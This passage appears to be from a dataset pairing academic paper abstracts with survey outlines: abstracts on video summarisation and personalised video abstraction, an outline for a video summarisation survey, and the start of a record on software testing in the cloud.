interfaces with the metadata and that works in compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata. Second, we address the main point of this system which is the utilization of this metadata to filter out frames, creating an abstract of a video summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video. We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from those detected events reflecting on their significance degree and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparing man-made video abstracts. --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index generates not only a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: VideoQA: question answering on news video paper_content: When querying a news video archive, the users are interested in retrieving precise answers in the form of a summary that best answers the query. However, current video retrieval systems, including the search engines on the web, are designed to retrieve documents instead of precise answers. This research explores the use of question answering (QA) techniques to support personalized news video retrieval. Users interact with our system, VideoQA, using short natural language questions with implicit constraints on contents, context, duration, and genre of expected videos. VideoQA returns short precise news video summaries as answers. The main contributions of this research are: (a) the extension of QA technology to support QA in news video; and (b) the use of multi-modal features, including visual, audio, textual, and external resources, to help correct speech recognition errors and to perform precise question answering. The system has been tested on 7 days of news video and has been found to be effective. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Affective content detection using HMMs paper_content: This paper discusses a new technique for detecting affective events using Hidden Markov Models(HMM). To map low level features of video data to high level emotional events, we perform empirical study on the relationship between emotional events and low-level features. After that, we compute simple low-level features that represent emotional characteristics and construct a token or observation vector by combining low level features. The observation vector sequence is tested to detect emotional events through HMMs. We create two HMM topologies and test both topologies. The affective events are detected from our proposed models with good accuracy. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: Semantic video summarization in compressed domain MPEG video paper_content: In this paper, we present a semantic summarization algorithm that interfaces with the metadata and that works in compressed domain, in particular MPEG-1 and MPEG-2 videos. In enabling a summarization algorithm through high-level semantic content, we try to address two major problems. First, we present the facility provided in the DVA system that allows the semi-automatic creation of this metadata. Second, we address the main point of this system which is the utilization of this metadata to filter out frames, creating an abstract of a video summary quality survey indicates that the proposed method performs satisfactorily. --- paper_title: Personalized abstraction of broadcasted American football video by highlight selection paper_content: Video abstraction is defined as creating shorter video clips or video posters from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted American football video. We first detect significant events in the video stream by matching textual overlays appearing in an image frame with the descriptions of gamestats in which highlights of the game are described. Then, we select highlight shots which should be included in the video abstract from those detected events reflecting on their significance degree and personal preferences, and generate a video clip by connecting the shots augmented with related audio and text. An hour-length video can be compressed into a minute-length personalized abstract. We experimentally verified the effectiveness of this method by comparing man-made video abstracts. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100p recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Automatic video summarizing tool using MPEG-7 descriptors for personal video recorder paper_content: We introduce an automatic video summarizing tool (AVST) for a personal video recorder. The tool utilizes MPEG-7 visual descriptors to generate a video index for a summary. The resulting index generates not only a preview of a movie but also allows non-linear access with thumbnails. In addition, the index supports the searching of shots similar to a desired one within saved video sequences. Moreover, simple shot-based video editing can readily be achieved using the generated index. --- paper_title: Personalized video summary using visual semantic annotations and automatic speech transcriptions paper_content: A personalized video summary is dynamically generated in our video personalization and summary system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. The process includes the shot-to-sentence alignment, summary segment selection, and user preference matching and propagation. As a result, the relevant visual shot and audio sentence segments are aggregated and composed into a personalized video summary. --- paper_title: Media content and type selection from always-on wearable video paper_content: A system is described for summarizing head-mounted or hand-carried "always-on" video. The example used is a tourist walking around a historic city with friends and family. The summary consists of a mixture of stills, panoramas and video clips. The system identifies both the scenes to appear in the summary and the media type used to represent them. As there are few shot boundaries in this class of video, the decisions are based on the system's classification of the user's behaviour demonstrated by the motion of the camera, and motion in the scene. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Auto-summarization of audio-video presentations paper_content: As streaming audio-video technology becomes widespread, there is a dramatic increase in the amount of multimedia content available on the net. Users face a new challenge: How to examine large amounts of multimedia content quickly. One technique that can enable quick overview of multimedia is video summaries; that is, a shorter version assembled by picking important segments from the original. We evaluate three techniques for automatic creation of summaries for online audio-video presentations. These techniques exploit information in the audio signal (e.g., pitch and pause information), knowledge of slide transition points in the presentation, and information about access patterns of previous users. We report a user study that compares automatically generated summaries that are 20%-25% the length of full presentations to author generated summaries. Users learn from the computer-generated summaries, although less than from authors' summaries. They initially find computer-generated summaries less coherent, but quickly grow accustomed to them. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Hierarchical video summarization based on context clustering paper_content: A personalized video summary is dynamically generated in our video personalization and summarization system based on user preference and usage environment. The three-tier personalization system adopts the server-middleware-client architecture in order to maintain, select, adapt, and deliver rich media content to the user. The server stores the content sources along with their corresponding MPEG-7 metadata descriptions. In this paper, the metadata includes visual semantic annotations and automatic speech transcriptions. Our personalization and summarization engine in the middleware selects the optimal set of desired video segments by matching shot annotations and sentence transcripts with user preferences. Besides finding the desired contents, the objective is to present a coherent summary. There are diverse methods for creating summaries, and we focus on the challenges of generating a hierarchical video summary based on context information. In our summarization algorithm, three inputs are used to generate the hierarchical video summary output. These inputs are (1) MPEG-7 metadata descriptions of the contents in the server, (2) user preference and usage environment declarations from the user client, and (3) context information including MPEG-7 controlled term list and classification scheme. In a video sequence, descriptions and relevance scores are assigned to each shot. Based on these shot descriptions, context clustering is performed to collect consecutively similar shots to correspond to hierarchical scene representations. The context clustering is based on the available context information, and may be derived from domain knowledge or rules engines. Finally, the selection of structured video segments to generate the hierarchical summary efficiently balances between scene representation and shot selection. --- paper_title: Dynamic video summarization of home video paper_content: An increasing number of people own and use camcorders to make videos that capture their experiences and document their lives. These videos easily add up to many hours of material. Oddly, most of them are put into a storage box and never touched or watched again. The reasons for this are manifold. Firstly, the raw video material is unedited, and is therefore long-winded and lacking visually appealing effects. Video editing would help, but, it is still too time-consuming; people rarely find the time to do it. Secondly, watching the same tape more than a few times can be boring, since the video lacks any variation or surprise during playback. Automatic video abstracting algorithms can provide a method for processing videos so that users will want to play the material more often. However, existing automatic abstracting algorithms have been designed for feature films, newscasts or documentaries, and thus are inappropriate for home video material and raw video footage in general. In this paper, we present new algorithms for generating amusing, visually appealing and variable video abstracts of home video material automatically. They make use of a new, empirically motivated approach, also presented in the paper, to cluster time-stamped shots hierarchically into meaningful units. Last but not least, we propose a simple and natural extension of the way people acquire video - so-called on-the-fly annotations - which will allow a completely new set of applications on raw video footage as well as enable better and more selective automatic video abstracts. Moreover, our algorithms are not restricted to home video but can also be applied to raw video footage in general. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: The CPR model for summarizing video paper_content: Most past work on video summarization has been based on selecting key frames from videos. We propose a model of video summarization based on three important parameters: Priority (of frames), Continuity (of the summary), and non-Repetition (of the summary). In short, a summary must include high priority frames, must be continuous and non-repetitive. An optimal summary is one that maximizes an objective function based on these three parameters. We develop formal definitions of all these concepts and provide algorithms to find optimal summaries. We briefly report on the performance of these algorithms. --- paper_title: Framework for personalized multimedia summarization paper_content: We extend and validate methods of personalization to the domain of automatically created multimedia summaries. Based on a previously performed user study of 59 people we derived a mapping of personality profile information to preferred multimedia features. This article describes our summarization algorithm. We define constraints for automatic summary generation. Summaries should consist of contiguous segments of full shots, with duration proportional to the log of video length, selected by an objective function of total "importance" of features, with heuristic rules for deciding the "best" combination of length and importance. We validated the summaries with a user study of 32 people. They were asked to answer a shortened series of personality queries. Using this current user profile, together with the earlier genre-specific reduced mapping and with automatically derived features, we automatically generated two summaries for each video: one optimally matched, and one matched to the "opposite" personality. Each user evaluated both summaries on a preference scale for four each of: news, talk show, and music videos. From a statistical analysis we find statistically significant evidence of the effectiveness of personalization on news and music videos, with no evidence of user subpopulations. We conclude for these genres that our claim, of a universal mapping from certain measured personality traits to the computable creation of preferred multimedia summaries, is supported. --- paper_title: Efficient access to video content in a unified framework paper_content: Book contents' browsing and retrieval have been greatly facilitated by its Table-of-Contents (ToC) and Index, respectively. Unfortunately, today's video lacks such powerful mechanisms. In this paper, we explore and present novel techniques for constructing video ToC and Index. Furthermore, we explore the relationship between video browsing and retrieval and propose a unified framework: to incorporate both entities in a seamless way. Experimental results on real-world video clips justify our proposed framework for providing efficient access to video content. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Learning personalized video highlights from detailed MPEG-7 metadata paper_content: We present a new framework for generating personalized video digests from detailed event metadata. In the new approach high level semantic features (e.g., number of offensive events) are extracted from an existing metadata signal using time windows (e.g., features within 16 sec. intervals). Personalized video digests are generated using a supervised learning algorithm which takes as input examples of important/unimportant events. Window-based features are extracted from the metadata and used to train the system and build a classifier that, given metadata for a new video, classifies segments into important and unimportant, according to a specific user, to generate personalized video digests. Our experimental results using soccer video suggest that extracting high level semantic information from existing metadata can be used effectively (80% precision and 85% recall using cross validation) in generating personalized video digests. --- paper_title: Video summarization based on the psychological unfolding of a drama paper_content: This paper proposes a method of composing digests of TV videos based on their psychological unfolding. Most of the studies of video summarization to date have been based on the video structure, such as cuts or objects in the video. It is generally considered, however, that the observer of a TV drama emphasizes instead the psychological unfolding of the video content (such as the climax). However, no method of summarizing a drama based on the psychological aspect of the video has been proposed. Track structures [such as cutting, lines spoken by the actors, BGM (background music), and sound effects] constitute physical components, and the dramatist skillfully manipulates the time structure based on his empirical knowledge in order to present a particular psychological impression. This paper proposes a method in which the psychologically important part is detected on the basis of empirical knowledge as a corresponding time-series pattern of the track structure, and a summarized video is generated. As an experiment, the proposed method was applied to a TV drama, and the time length was reduced to approximately 1/14. Subjective evaluation experiments show that the proposed method preserves the content of the main plot, with naturalness of extraction, thus indicating the usefulness of the proposed method. © 2002 Wiley Periodicals, Inc. Syst Comp Jpn, 33(11): 39–49, 2002; Published online in Wiley InterScience (www.interscience.wiley.com). DOI 10.1002/scj.10066 --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. ---
Title: Video summarisation: A conceptual framework and survey of the state of the art Section 1: Introduction Description 1: Introduce the growing need for video summarisation and give an overview of the paper's goals and structure. Section 2: A conceptual framework for video summarisation Description 2: Present a conceptual framework for video summarisation, including the rationale and basis for categorising video summarisation techniques and summaries. Section 3: Techniques for summarising video Description 3: Describe the different techniques for video summarisation classified into internal, external, and hybrid techniques. Section 4: Video summaries produced by video summarisation techniques Description 4: Discuss the various types of video summaries produced by internal, external, and hybrid techniques. Section 5: Applications of video summarisation Description 5: Outline different applications of video summarisation and how they leverage the benefits of summarised video content. Section 6: Internal summarisation techniques and summaries Description 6: Review internal summarisation techniques and the types of summaries they produce. Section 7: External summarisation techniques and summaries Description 7: Describe external summarisation techniques, how they operate, and the kinds of summaries they generate. Section 8: Hybrid summarisation techniques and summaries Description 8: Discuss hybrid summarisation techniques and the resultant summaries they produce by combining both internal and external information. Section 9: Challenges and recommendations for future directions Description 9: Identify challenges faced by current summarisation techniques and provide recommendations for future research directions in video summarisation. Section 10: Concluding discussion Description 10: Summarise the key points discussed in the paper and the importance of future research directions to address existing challenges in video summarisation.
A Survey of Software Testing in the Cloud
9
--- paper_title: Adoption issues for cloud computing paper_content: Cloud computing allows users to use only a Web browser to receive computing services via the Internet. Users only need to pay for the services they actually use. It appears that a wide adoption of cloud computing in the foreseeable future is inevitable, and its adoption will bring about a sea change in the pricing and distribution practices for both software and hardware. There are, however, various issues that will impede adoption of cloud computing. Most of them can be solved. We discuss the status of cloud computing today and various adoption issues. We also provide a market prognosis. --- paper_title: A model-driven approach for automating mobile applications testing paper_content: Software testing faces up several challenges. One out of these is the opposition between time-to-market software delivery and the excessive length of testing activities. The latter results from the growth of the application complexity along with the diversity of handheld devices. The economical competition, branding impose zero-defect products, putting forward testing as an even more crucial activity. In this paper, we describe a Domain-Specific Modeling Language (DSML) built upon an industrial platform (a test bed) which aims to automate mobile application checking. A key characteristic of this DSML is its ability to cope with variability in the spirit of software product line engineering. We discuss this DSML as part of a tool suite enabling the test of remote devices having variable features. --- paper_title: Cloud Computing – Issues, Research and Implementations paper_content: "Cloud" computing – a relatively recent term, builds on decades of research in virtualization, distributed computing, utility computing, and more recently networking, web and software services. It implies a service oriented architecture, reduced information technology overhead for the end-user, great flexibility, reduced total cost of ownership, on-demand services and many other things. This paper discusses the concept of “cloud” computing, some of the issues it tries to address, related research topics, and a 